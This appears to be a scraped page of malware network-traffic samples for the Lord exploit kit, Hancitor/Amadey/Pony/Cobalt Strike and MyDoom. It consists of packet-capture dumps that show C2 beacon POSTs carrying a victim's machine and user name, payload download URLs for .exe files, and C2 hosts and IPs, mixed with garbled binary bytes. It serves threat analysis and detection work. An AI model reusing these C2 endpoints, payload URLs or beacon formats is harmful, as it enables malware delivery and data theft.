…4_LS..W..1j.?8+..)…J….-,.d……t@.q.. .P…….&.l..c<.05C..@…IP..i..n….,…,…tG..Y…..k2l..a. .9……hRQ{….q.{DHr..49......{D]I...w<....re.w ..9………….$..:…P..A..sV.C..T!…..7.|m..T_.U…..B…+e5B2.@.X…lDY..r.9!R?tJY2!.......dC.+n!s...... f.....&W..!...H!..4~~...L.w......R..L ..#....^0..4.h.<......\.$..Jq).( W..%T0D9.M..2@<.O..._.|4L....q...H. .>\F.._.....?("Jb.......$1...)y>a..,.......aM.....:.H.8B...a4;....V .....i x...W...:.i)%.VL.f@..C.W,.....W..Q=y..(....G..\2W..L...........*]b..q#...%2"..L...Hq...\..U ...K.$Cw.(b../Gh.XW.q..[.k%.A.W..0.&.".q)h.E<W................).#8.$2T0.I.FJ.A .{j.D".A.......8"6_L.O..>Pu/7u'bX.O.u!.....T.1.%w.:;].J........KRL.0...Ll....H(..X.I.. a..)..).H..l..w.k 2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460 E...........Q... ..e.....;......P........%....0X.......y........S..@/........UA[HP[_.6kQ.h...4.<&.%.._..}\ ...._.>.,.[[<......XD.]F.N..... ........M.L..|...p ...y...Z...)...........A..{.....k[..X.i..v..i.v./...........….$. .E.8..F..I….H…..L…l..i…Y…..O.tK.D..Z..z.RF..RH.|C…0../.i…8%…%a., !’… .&…….u.D...!..h.Hh.8%..i.x…..B.5;.Q…..c$X.hY..@s=..13.0….yu.0.X..$k……J.~a…Z..>………8..$…Wi…..sX..`7.q.T.....C"pZR2E&.7#.OK.J...6. h....;..\$...$.....a..9.....L..qJ...n.H..._...<-..M[.6.....>L%....WdHg...d....^.|...&.b....]..s8...c.!qE.H....4.....W..)|...-Qg.F.(.>%...].{.n.Z.....a.e.........%Z7.v9..> 5P…..N ….D…’…1.0.0…#E…...].<..3?8….H’].L….B….8..N.RM^..)…..$p.u-……]. .7.- .@.H….c.@….7….6..6#..u…….@…V,B#-#q..:B…P.5E.P Z……..CJ..TR.x.T.x…y…..ki……….xg.x…….).P…..m.)2p.).C..5..1.~…Y..….2.”. ……E.8..|.+….9..….@.HTTP.%m.i../t5. .X.?.$.p3….W…….%l../G…d…#=..C.i…..……P9T…..;…ep.+..?…..?.p<.fP$..y..i..=.b…..Og..m….Ci..}..G.{.J!..,%.c.)..X….|.wz….G..BC…[..u.Q.A….pN….0..a…&..SB..B…I…..\Z( ….V…Iw…9j=.NDxi..$…….yk….8….a.P…5. Jx…..w!TI..0.gv..$t…..+…$…-.2’…Bt…!….E….n.H.k.. …..$……..P.#…Y..^@.j”/gHp…..j..R)z.(%-s……u.p..W.e@…^.(M ..0I…o?d\5.c…BB.@ .|d..G..*.7,..q.z!..s.l… .VD....u.0....#,...c4A..C..( ..u-..,7....%.'.j...K.(5PS_..N..9..Q...$y..t8..C ).=<.\...9.T....Yt.().!RpK..Ppy…..

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{“uid”:”d708005f8b8c91d1″}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{“response”:””,”code”:0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

..6….U..!..,b.)..P...:.bao)..dW,......u._...mF...Ht..f2!d.._...Q!-P.....4.Ka".X../....)...A}.k.p.T.R(..5.....$.p.?..V.....uH........6.|"N.g...a@~w!.stwW.....K[C..8..-m..=.H*..#'0......…&..4..s..[9X:….6..g..u.
…2.X/&….h1.@I.E^’..~..z.......F5~..,.3p...$-l}.W..4? ...}7L...*|..s.(vr_.9……ys3.BH….”{Kt…L.N.Y….\3…..”Q….,2tP….k…….1…d$..#h…….<.S.r6.N_7…!’……b…H[.Lm.u.,.G..dRWPEX1.U……..i2..Z)o……I.n…/..)..C.Q……2.F[.{V…..*kQ. ^D….D…U….KI{.f.B…v…..?)….y…. ……7.z.Kq..Z.SF….k.yg”T….-…..Z.x.(…%igr.A …K.f…..D…..;.K……<.]…….C.8.0.l(B………p>-.u..~.GB..C..s.jJu.]..<.m..OgM….g..u……….5E.A……i:>……O..Rp..#?..M%...{....4@6...@.(.O....Rv.1.f{….y..Q../TB…L.SE..X.:t….J..LG}…D.Uu……….^.!.o.Qdy..3,Y…^.9…b…..9..X..Tj.
.i$f.1….A..E………1.S…j….R….5Wr…avO…..v..w2./…]3.W.>}l.1.x..3….0.<}…{“…r6);.$………..f/’…C.i.X>..s.<..B..J.fO.A.~&...H#..[.....9.8vA{....2e...T<..4Q.s. ..a)u]x|....e.\.3.h...eD.......}.M.18......U.a,E..$……..o.T.jH.dlS..SIw.4…..H…,C…7.+….j…….e.n.x..>qL.z..=.8.mly.(…oo.”……r…UK…?.4.$v.X.V
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
9`..c#.....M...>.......%...7.).....Q.._Cwj-..U..PA..Ru..^.q....0.....t"........r.g..C.n.v...o.?...gw.....}......V|....B~........._..^.l...}B..z.. -.eP.....!.r.Y.....&..^. ........sr...X.....V...'..o.........o...-v..:.G...:...../.."...&j.p..B50n+"..z......a.c.K...t.9..d.W..hc... .'....F.A._o.'^Ev....d...%.j..}.. .........V...sK....Y.........Z.c...]8..H..Vak...~Uk...*.R....}.T...$..J....Usey U..X>....a.....,..8.S..[^....q.c..>w........gi....d..LE.d......("a.. .g..HV.8\...re4. -/+?T.-C..3...a(....6.3...Z...lh.....!N(4...Pb_.}.......S.qY?...U...X...r..8... o...7..K........Gq:W..0.. ..A….`~…a8.
.,g……._&4.N….h…C.<.0..#…..}EQ.\9…….m…bT. 2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin‘s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it. 

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability.  One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs.  Source : https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f……
..e
….x.5.&E…………..codeotso.com…..
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6…….

..e.5.x.6……………codeotso.com……………..S…
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@….[
..eS……Po0W3…… ..T…………..
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6……CS…
..e.P..rM..o0W4`………..
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@….e
..eS……Po0W4rM..P….T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E….j@….~
..eS……Po0W4rM..P…….POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6……FS…
..e.P..rM..o0X.P….n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6……ES…
..e.P..rM..o0X.P….x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6…….

..e.5…8..sJ………..fordifortti.ru……………..Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@…..
..eMxs….PQd…….. ……………..
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6…….

..e.5…;..LS………..material-nerud.ru……………..\5. 2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0 E..,6......}Mxs. ..e.P.. DrUQd..…^.…..
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…..
..eMxs….PQd..
DrVP…v…
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E….r@…..
..eMxs….PQd..
DrVP…….POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6…….Mxs.
..e.P..
DrVQd..P…u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@…..
..e\5....P.]2....... ..[.............. 2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0 E..,6.....$.\5.
..e.P…..<.]2.....p...... 2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0 E..(.t@...." ..e\5….P.]2….=P……. 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@…..
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: material-nerud.ru Connection: Keep-Alive 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1 E..n.u@..... ..e\5….P.]2….=P…7…GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6…..$.\5`.
..e.P…..=.]4.P…….
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…6…….Mxs.
..e.P..
DrVQd..P… C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@…..
..eMxs….PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6……|Mxs.
..e.P..
Ds.Qd..P…tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6…….\5`.
..e.P…..=.]4.P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: “5d39c1ad-49400”
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…P.o..6.i.P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$….w.^| 5
..e.P..6.i..o..P…8…
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%….w.^| 5
..e.P…Q..L…`………..
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n(
..e^| 5…PL….Q..P…….
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…PL….Q..P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&….w.^| 5
..e.P…Q..L..CP….5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8’……S…
..e.P….p..Y.RP…….
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@….A
..eS……P.Y.R..p.P..+….
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(….rI^| 5
..e.P..6.i..o..P…….HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@…..
..eMxs….P..7.`.?-P…b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86……Mxs.
..e.P..`.?-..8.P….V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E…..@….{
..e.,.!. .P[^b0.#.jP…+…GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8……..,.!
..e.P. .#.j[^b.P…s…
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8……;S…
..e.P.!ZB..+..Q`………..
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..eS….!.P+..QZB..P….F..
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@….c
..eS….!.P+..QZB..P…6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8……>S…
..e.P.!ZB..+…P…….
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….3
..e.,.!.”.P.b…….. ……………..
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8……~Mxs.
..e.P……….P…….
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@….7
..eMxs….P……..P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E…8……..,.!
..e.P. .#.j[^b.P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E….r@….5
..e.,.!.#.P….?t.5P….2..GET /visit.js HTTP/1.1
Accept: /
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impacts, but main attacks are DDOS
MyDoom uses DGA for its P2P communications but also some Command and Control Server

Damage of an estimated $38.7 billion was caused by the fastest spreading malware Mydoom to Microsoft Windows-based computers. Spyware is a deadly malware that extracts a company’s confidential information without awareness of the company.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ... ..e.5...L...............mail mailroute.net..................Y.x.............Y.x 2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@..... ..e.Y.x......O....... ................. 2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0 E..,......O..Y.x ..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….z
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….y
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=……..
..e
……5.)[u.G………..libreoffice.org…..
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
E..=…….~
..e
……5.)……………libreoffice.org…..
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….w
..e
